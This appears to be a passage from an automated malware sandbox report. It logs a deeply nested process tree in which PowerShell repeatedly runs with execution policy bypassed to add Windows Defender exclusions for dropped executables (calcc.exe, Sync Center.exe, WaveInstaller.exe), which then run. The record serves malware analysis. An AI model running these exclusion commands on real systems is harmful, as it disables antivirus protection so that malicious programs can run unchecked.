        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe'
        34⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1048
        
        C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WaveInstaller.exe"
        34⤵
        
        PID:4676
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
        34⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3088
        
        C:\Users\Admin\AppData\Local\Temp\calcc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
        34⤵
        
        PID:3016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
        34⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3816
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4700
        
        C:\Users\Admin\AppData\Local\Temp\calcc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
        33⤵
        Executes dropped EXE
        
        PID:4452
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
        33⤵
        
        PID:1064
        
        C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
        33⤵
        
        PID:4616
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:572
        
        C:\Users\Admin\AppData\Local\Temp\calcc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
        32⤵
        Executes dropped EXE
        
        PID:2448
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2736
        
        C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
        32⤵
        Executes dropped EXE
        
        PID:3088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3624
        
        C:\Users\Admin\AppData\Local\Temp\calcc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
        31⤵
        Executes dropped EXE
        
        PID:3552
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5116
        
        C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
        31⤵
        Executes dropped EXE
        
        PID:5020
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:772
        
        C:\Users\Admin\AppData\Local\Temp\calcc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
        30⤵
        Executes dropped EXE
        
        PID:4452
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
        30⤵
        
        PID:2960
        
        C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
        30⤵
        Executes dropped EXE
        
        PID:2924
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1576
        
        C:\Users\Admin\AppData\Local\Temp\calcc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
        29⤵
        Executes dropped EXE
        
        PID:4420
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
        29⤵
        
        PID:1704
        
        C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
        29⤵
        Executes dropped EXE
        
        PID:4688
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
        28⤵
        
        PID:2256
        
        C:\Users\Admin\AppData\Local\Temp\calcc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
        28⤵
        Executes dropped EXE
        
        PID:4532
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
        28⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5052
        
        C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
        28⤵
        Executes dropped EXE
        
        PID:788
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
        27⤵
        
        PID:2184
        
        C:\Users\Admin\AppData\Local\Temp\calcc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
        27⤵
        Executes dropped EXE
        
        PID:4444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2776
        
        C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
        27⤵
        Executes dropped EXE
        
        PID:2016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
        26⤵
        
        PID:3852
        
        C:\Users\Admin\AppData\Local\Temp\calcc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
        26⤵
        Executes dropped EXE
        
        PID:4952
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2704
        
        C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
        26⤵
        Executes dropped EXE
        
        PID:4420
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
        25⤵
        
        PID:2352
        
        C:\Users\Admin\AppData\Local\Temp\calcc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
        25⤵
        Executes dropped EXE
        
        PID:3808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4668
        
        C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
        25⤵
        Executes dropped EXE
        
        PID:972
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4176
        
        C:\Users\Admin\AppData\Local\Temp\calcc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
        24⤵
        Executes dropped EXE
        
        PID:4808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
        24⤵
        
        PID:3456
        
        C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
        24⤵
        Executes dropped EXE
        
        PID:3568
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4112
        
        C:\Users\Admin\AppData\Local\Temp\calcc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
        23⤵
        Executes dropped EXE
        
        PID:4120
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
        23⤵
        
        PID:4052
        
        C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
        23⤵
        Executes dropped EXE
        
        PID:1716
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4896
        
        C:\Users\Admin\AppData\Local\Temp\calcc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
        22⤵
        Executes dropped EXE
        
        PID:3068
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2008
        
        C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
        22⤵
        Executes dropped EXE
        
        PID:5000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1472
        
        C:\Users\Admin\AppData\Local\Temp\calcc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
        21⤵
        Executes dropped EXE
        
        PID:4392
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
        21⤵
        
        PID:2612
        
        C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
        21⤵
        Executes dropped EXE
        
        PID:2960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
        20⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1628
        
        C:\Users\Admin\AppData\Local\Temp\calcc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
        20⤵
        Executes dropped EXE
        
        PID:4768
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
        20⤵
        
        PID:4276
        
        C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
        20⤵
        Executes dropped EXE
        
        PID:2064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1796
        
        C:\Users\Admin\AppData\Local\Temp\calcc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
        19⤵
        Executes dropped EXE
        
        PID:2288
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
        19⤵
        
        PID:2956
        
        C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
        19⤵
        Executes dropped EXE
        
        PID:4900
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4936
        
        C:\Users\Admin\AppData\Local\Temp\calcc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
        18⤵
        Executes dropped EXE
        
        PID:4664
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3052
        
        C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
        18⤵
        Executes dropped EXE
        
        PID:4708
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
        17⤵
        
        PID:2400
        
        C:\Users\Admin\AppData\Local\Temp\calcc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
        17⤵
        Executes dropped EXE
        
        PID:5080
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2480
        
        C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
        17⤵
        Executes dropped EXE
        
        PID:4316
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
        16⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4708
        
        C:\Users\Admin\AppData\Local\Temp\calcc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
        16⤵
        Executes dropped EXE
        
        PID:3164
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
        16⤵
        
        PID:4444
        
        C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
        16⤵
        Executes dropped EXE
        
        PID:1064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1812
        
        C:\Users\Admin\AppData\Local\Temp\calcc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
        15⤵
        Executes dropped EXE
        
        PID:2364
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4176
        
        C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
        15⤵
        Executes dropped EXE
        
        PID:3852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
        14⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1804
        
        C:\Users\Admin\AppData\Local\Temp\calcc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
        14⤵
        Executes dropped EXE
        
        PID:1700
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
        14⤵
        
        PID:4176
        
        C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
        14⤵
        Executes dropped EXE
        
        PID:4836
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
        13⤵
        
        PID:2544
        
        C:\Users\Admin\AppData\Local\Temp\calcc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
        13⤵
        Executes dropped EXE
        
        PID:5088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4392
        
        C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
        13⤵
        Executes dropped EXE
        
        PID:2008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2420
        
        C:\Users\Admin\AppData\Local\Temp\calcc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
        12⤵
        Executes dropped EXE
        
        PID:1064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
        12⤵
        
        PID:972
        
        C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
        12⤵
        Executes dropped EXE
        
        PID:3712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1796
        
        C:\Users\Admin\AppData\Local\Temp\calcc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
        11⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3772
        
        C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
        11⤵
        Executes dropped EXE
        
        PID:4676
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3772
        
        C:\Users\Admin\AppData\Local\Temp\calcc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
        10⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2252
        
        C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4888
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4768
        
        C:\Users\Admin\AppData\Local\Temp\calcc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4344
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4708
        
        C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3252
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2544
        
        C:\Users\Admin\AppData\Local\Temp\calcc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3660
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3952
        
        C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1144
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4236
        
        C:\Users\Admin\AppData\Local\Temp\calcc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1844
        
        C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3164
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1844
      - C:\Users\Admin\AppData\Local\Temp\calcc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2308
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
